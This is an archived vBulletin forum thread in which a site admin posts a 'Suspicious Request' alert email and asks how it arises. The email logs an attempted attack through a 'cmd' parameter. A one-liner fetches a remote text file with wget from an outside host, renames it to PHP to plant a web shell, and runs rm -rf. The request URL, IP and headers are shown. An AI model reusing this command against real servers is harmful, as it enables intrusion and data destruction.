The Arcive of Official vBulletin Modifications Site.

Art Andrews · #1 01-20-2014, 04:49 PM

For the life of me, I can' figure out where these are coming from but I'd like to know more so I can investigate further. From time to time we get an email like the one below:

Email title:
Suspicious Request

Email body:
Cinput: wget http://www.allegoriaonline.it/images/incs.txt ; mv incs.txt incs.php ; rm -rf componentz.zip

Forum: http://www.therpf.com

IP: 176.28.49.238
User-agent: Mozilla/4.0 (compatible; MSIE 7.0; America Online Browser 1.1; Windows NT 5.1; (R1 1.5); .NET CLR 2.0.50727; InfoPath.1)
Request: /forum.php//images/stories/racrew.php?cmd=wget%20http://www.allegoriaonline.it/images/incs.txt%20;%20mv%20incs.txt%20incs.php%20;%20rm%2 0-rf%20componentz.zip
User: Unregistered

GET: array (
'cmd' => 'wget http://www.allegoriaonline.it/images/incs.txt ; mv incs.txt incs.php ; rm -rf componentz.zip',
)

POST: array (
'ajax' => NULL,
)

COOKIE: array (
'vbulletin_collapse' => NULL,
'bb_referrerid' => NULL,
'bb_userid' => NULL,
'bb_password' => NULL,
'bb_lastvisit' => NULL,
'bb_lastactivity' => NULL,
'bb_threadedmode' => NULL,
'bb_sessionhash' => NULL,
'bb_userstyleid' => NULL,
'bb_languageid' => NULL,
'bb_skipmobilestyle' => NULL,
'bb_forum_view' => NULL,
'vbulletin_sidebar_collapse' => NULL,
)

I have asked my server admin about it and he said nothing on the server side is doing it and that it is being generated through vB. I can't seem to find any info on it. Please help!

Thread Tools
Show Printable Version Email this Page
Display Modes
Switch to Linear Mode Hybrid Mode Switch to Threaded Mode

X vBulletin 3.8.12 by vBS Debug Information
Page Generation 0.04653 seconds Memory Usage 2,184KB Queries Executed 11 (?)
More Information
Template Usage: (1)SHOWTHREAD (1)ad_footer_end (1)ad_footer_start (1)ad_header_end (1)ad_header_logo (1)ad_navbar_below (1)ad_showthread_beforeqr (1)footer (1)forumjump (1)forumrules (1)gobutton (1)header (1)headinclude (1)navbar (3)navbar_link (120)option (1)post_thanks_box (1)post_thanks_button (1)post_thanks_javascript (1)post_thanks_navbar_search (1)post_thanks_postbit_info (1)postbit (1)postbit_onlinestatus (1)postbit_wrapper (1)showthread_list (1)spacer_close (1)spacer_open (1)tagbit_wrapper Phrase Groups Available: global inlinemod postbit posting reputationlevel showthread	Included Files: ./showthread.php ./global.php ./includes/init.php ./includes/class_core.php ./includes/config.php ./includes/functions.php ./includes/class_hook.php ./includes/modsystem_functions.php ./includes/functions_bigthree.php ./includes/class_postbit.php ./includes/class_bbcode.php ./includes/functions_reputation.php ./includes/functions_threadedmode.php ./includes/functions_post_thanks.php Hooks Called: init_startup init_startup_session_setup_start init_startup_session_setup_complete cache_permissions fetch_threadinfo_query fetch_threadinfo fetch_foruminfo style_fetch cache_templates global_start parse_templates global_setup_complete showthread_start showthread_getinfo forumjump showthread_post_start showthread_query_postids_threaded showthread_threaded_construct_link showthread_query bbcode_fetch_tags bbcode_create showthread_postbit_create postbit_factory postbit_display_start post_thanks_function_post_thanks_off_start post_thanks_function_post_thanks_off_end post_thanks_function_fetch_thanks_start post_thanks_function_fetch_thanks_end post_thanks_function_thanked_already_start post_thanks_function_thanked_already_end fetch_musername postbit_imicons bbcode_parse_start bbcode_parse_complete_precache bbcode_parse_complete postbit_display_complete post_thanks_function_can_thank_this_post_start tag_fetchbit_complete forumrules navbits navbits_complete showthread_complete
Messages:

The Arcive of Official vBulletin Modifications Site.

It is not a VB3 engine, just a parsed copy!